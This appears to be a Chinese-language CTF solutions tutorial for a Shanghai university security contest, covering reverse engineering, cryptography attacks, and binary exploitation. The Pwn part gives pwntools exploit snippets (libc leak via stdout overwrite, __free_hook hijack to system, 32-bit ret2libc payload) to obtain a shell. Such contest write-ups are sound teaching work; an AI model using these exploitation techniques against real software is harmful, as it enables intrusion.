第十届上海市大学生网络安全大赛Pwn&Re&Crypto全解教学文档<\/h1>

一、Reverse Engineering (逆向工程) 部分<\/h2>

EasyRE 题目解析<\/h3>

加密函数分析<\/h4>
加密函数 sub_140001070<\/code> 包含三个主要阶段：<\/p>

S-盒初始化<\/strong>：使用标准RC4算法初始化S盒<\/li>
主加密循环<\/strong>：结合S盒和自定义操作进行加密<\/li>
最后的混淆<\/strong>：对加密结果进行额外处理<\/li>
<\/ol>
加密数据<\/h4>
93 F9 8D 92 52 57 D9 05 C6 0A 50 C7 DB 4F CB D8 5D A6 B9 40 95 70 E7 9A 37 72 4D EF 57
<\/code><\/pre>
解密脚本编写步骤<\/h4>


逆向加密阶段3<\/strong>：<\/p>

第一个字节：C[0] = C'[0] ^ 0x42<\/code><\/li>
后续字节：C[i] = (C'[i] ^ C'[i-1]) ^ 0x42<\/code><\/li>
<\/ul>
<\/li>

S-盒初始化<\/strong>：<\/p>
S =<\/span> bytearray(range(256<\/span>))
<\/span><\/span>j =<\/span> 0<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(256<\/span>):
<\/span><\/span>    temp =<\/span> S[i]
<\/span><\/span>    j =<\/span> (j +<\/span> S[i] +<\/span> (i %<\/span> 7<\/span>) +<\/span> 4919<\/span>) &<\/span> 0xFF<\/span>
<\/span><\/span>    S[i], S[j] =<\/span> S[j], temp
<\/span><\/span><\/code><\/pre><\/li>

逆向加密阶段2<\/strong>：<\/p>

模拟S-盒状态更新<\/li>
计算密钥流并解密：
k_part =<\/span> (i *<\/span> j) %<\/span> 16<\/span>
<\/span><\/span>S_lookup =<\/span> S[(S_i_old +<\/span> S[i]) &<\/span> 0xFF<\/span>]
<\/span><\/span>temp_val =<\/span> (ROR(ciphertext_byte, 3<\/span>) -<\/span> k_part) &<\/span> 0xFF<\/span>
<\/span><\/span>decrypted_flag[k] =<\/span> temp_val ^<\/span> S_lookup
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ol>
二、Pwn (二进制漏洞利用) 部分<\/h2>
user 题目解析<\/h3>
漏洞点<\/h4>

在edit功能中存在越界写漏洞<\/li>
可以修改stdout结构体泄露libc地址<\/li>
通过修改__free_hook为system函数地址获取shell<\/li>
<\/ul>
利用步骤<\/h4>


泄露libc地址<\/strong>：<\/p>
edit(-<\/span>8<\/span>, p64(0xfbad1800<\/span>)+<\/span>p64(0<\/span>)*<\/span>3<\/span>+<\/span>b<\/span>'<\/span>\x00<\/span>'<\/span>)
<\/span><\/span>libc_addr =<\/span> l64() -<\/span> 0x1b5fd9<\/span>
<\/span><\/span><\/code><\/pre><\/li>

获取关键函数地址<\/strong>：<\/p>
system =<\/span> libc.<\/span>sym['system'<\/span>]
<\/span><\/span>free_hook =<\/span> libc.<\/span>sym['__free_hook'<\/span>]
<\/span><\/span><\/code><\/pre><\/li>

修改__free_hook<\/strong>：<\/p>
edit_(-<\/span>11<\/span>, p64(free_hook))
<\/span><\/span>edit_(-<\/span>11<\/span>, p64(system))
<\/span><\/span><\/code><\/pre><\/li>

触发shell<\/strong>：<\/p>
delete(0<\/span>)  # 删除包含\/bin\/sh的堆块<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
account 题目解析<\/h3>
漏洞点<\/h4>

32位程序的栈溢出漏洞<\/li>
地址空间布局随机化(ASLR)未启用<\/li>
可直接进行ret2libc攻击<\/li>
<\/ul>
利用步骤<\/h4>


泄露libc地址<\/strong>：<\/p>
puts_plt =<\/span> elf.<\/span>plt['puts'<\/span>]
<\/span><\/span>puts_got =<\/span> elf.<\/span>got['puts'<\/span>]
<\/span><\/span>payload =<\/span> cyclic(offset) +<\/span> p32(puts_plt) +<\/span> p32(main_addr) +<\/span> p32(puts_got)
<\/span><\/span><\/code><\/pre><\/li>

计算system地址<\/strong>：<\/p>
libc_addr =<\/span> u32(mx.<\/span>recv(4<\/span>)) -<\/span> 0x6d1e0<\/span>
<\/span><\/span>system =<\/span> libc.<\/span>sym['system'<\/span>]
<\/span><\/span>bin_sh =<\/span> next(libc.<\/span>search(b<\/span>'\/bin\/sh<\/span>\0<\/span>'<\/span>))
<\/span><\/span><\/code><\/pre><\/li>

获取shell<\/strong>：<\/p>
payload =<\/span> cyclic(offset) +<\/span> p32(system) +<\/span> p32(main_addr) +<\/span> p32(bin_sh)
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
三、Cryptography (密码学) 部分<\/h2>
AES_GCM_IV_Reuse 题目解析<\/h3>
漏洞分析<\/h4>

使用固定的IV和密钥进行多次加密<\/li>
违反GCM模式的安全要求<\/li>
相同IV和密钥导致加密流重复<\/li>
<\/ul>
利用步骤<\/h4>


提取已知信息<\/strong>：<\/p>

已知明文和对应的密文<\/li>
目标密文<\/li>
<\/ul>
<\/li>

分离密文和认证标签<\/strong><\/p>
<\/li>

计算加密流<\/strong>：<\/p>
keystream =<\/span> known_plaintext ^<\/span> known_ciphertext
<\/span><\/span><\/code><\/pre><\/li>

解密密文<\/strong>：<\/p>
flag =<\/span> target_ciphertext ^<\/span> keystream
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
多重Caesar密码 题目解析<\/h3>
题目信息<\/h4>

密文：myfz{hrpa_pfxddi_ypgm_xxcqkwyj_dkzcvz_2025}<\/code><\/li>
提示："改进的Caesar密码"<\/li>
<\/ul>
解密方法<\/h4>


计算密钥流<\/strong>：<\/p>
shift =<\/span> (ord(ciphertext_char) -<\/span> ord(plaintext_char)) %<\/span> 26<\/span>
<\/span><\/span><\/code><\/pre><\/li>

编写解密脚本<\/strong>：<\/p>
shifts =<\/span> [7<\/span>, 13<\/span>, ...<\/span>]  # 计算出的移位序列<\/span>
<\/span><\/span>plaintext =<\/span> []
<\/span><\/span>for<\/span> i, c in<\/span> enumerate(ciphertext):
<\/span><\/span>    if<\/span> c.<\/span>isalpha():
<\/span><\/span>        shift =<\/span> shifts[i %<\/span> len(shifts)]
<\/span><\/span>        plaintext.<\/span>append(chr((ord(c) -<\/span> ord('a'<\/span>) -<\/span> shift) %<\/span> 26<\/span> +<\/span> ord('a'<\/span>)))
<\/span><\/span>    else<\/span>:
<\/span><\/span>        plaintext.<\/span>append(c)
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
RSA-dl_leak 题目解析<\/h3>
漏洞分析<\/h4>

私钥低位泄露<\/li>
可能导致RSA被完全破解<\/li>
<\/ul>
利用方法<\/h4>

使用Coppersmith攻击<\/strong><\/li>
部分私钥信息恢复完整私钥<\/strong><\/li>
<\/ol>
示例脚本<\/h4>
n =<\/span> ...<\/span>  # 模数<\/span>
<\/span><\/span>e =<\/span> ...<\/span>  # 公钥<\/span>
<\/span><\/span>d_low =<\/span> ...<\/span>  # 泄露的私钥低位<\/span>
<\/span><\/span>
<\/span><\/span># 使用Coppersmith方法恢复完整私钥<\/span>
<\/span><\/span># 具体实现取决于泄露的位数和位置<\/span>
<\/span><\/span><\/code><\/pre>四、通用解题技巧<\/h2>


逆向工程<\/strong>：<\/p>

分析加密函数的各个阶段<\/li>
逆向每个阶段的处理逻辑<\/li>
编写对应的解密脚本<\/li>
<\/ul>
<\/li>

二进制漏洞利用<\/strong>：<\/p>

识别漏洞类型（堆\/栈溢出、UAF等）<\/li>
构造利用链泄露关键地址<\/li>
劫持程序控制流获取shell<\/li>
<\/ul>
<\/li>

密码学题目<\/strong>：<\/p>

识别加密算法和模式<\/li>
分析可能的实现漏洞<\/li>
利用已知信息推导未知部分<\/li>
<\/ul>
<\/li>

脚本编写技巧<\/strong>：<\/p>

使用pwntools进行二进制交互<\/li>
使用z3等约束求解器处理复杂逻辑<\/li>
实现加密算法的逆向版本<\/li>
<\/ul>
<\/li>
<\/ol>
第十届上海市大学生网络安全大赛Pwn&Re&Crypto全解教学文档<\/h1>

一、Reverse Engineering (逆向工程) 部分<\/h2>

EasyRE 题目解析<\/h3>

二、Pwn (二进制漏洞利用) 部分<\/h2>

user 题目解析<\/h3>

account 题目解析<\/h3>

三、Cryptography (密码学) 部分<\/h2>

AES_GCM_IV_Reuse 题目解析<\/h3>

多重Caesar密码 题目解析<\/h3>

RSA-dl_leak 题目解析<\/h3>

多重Caesar密码题目解析<\/h3>
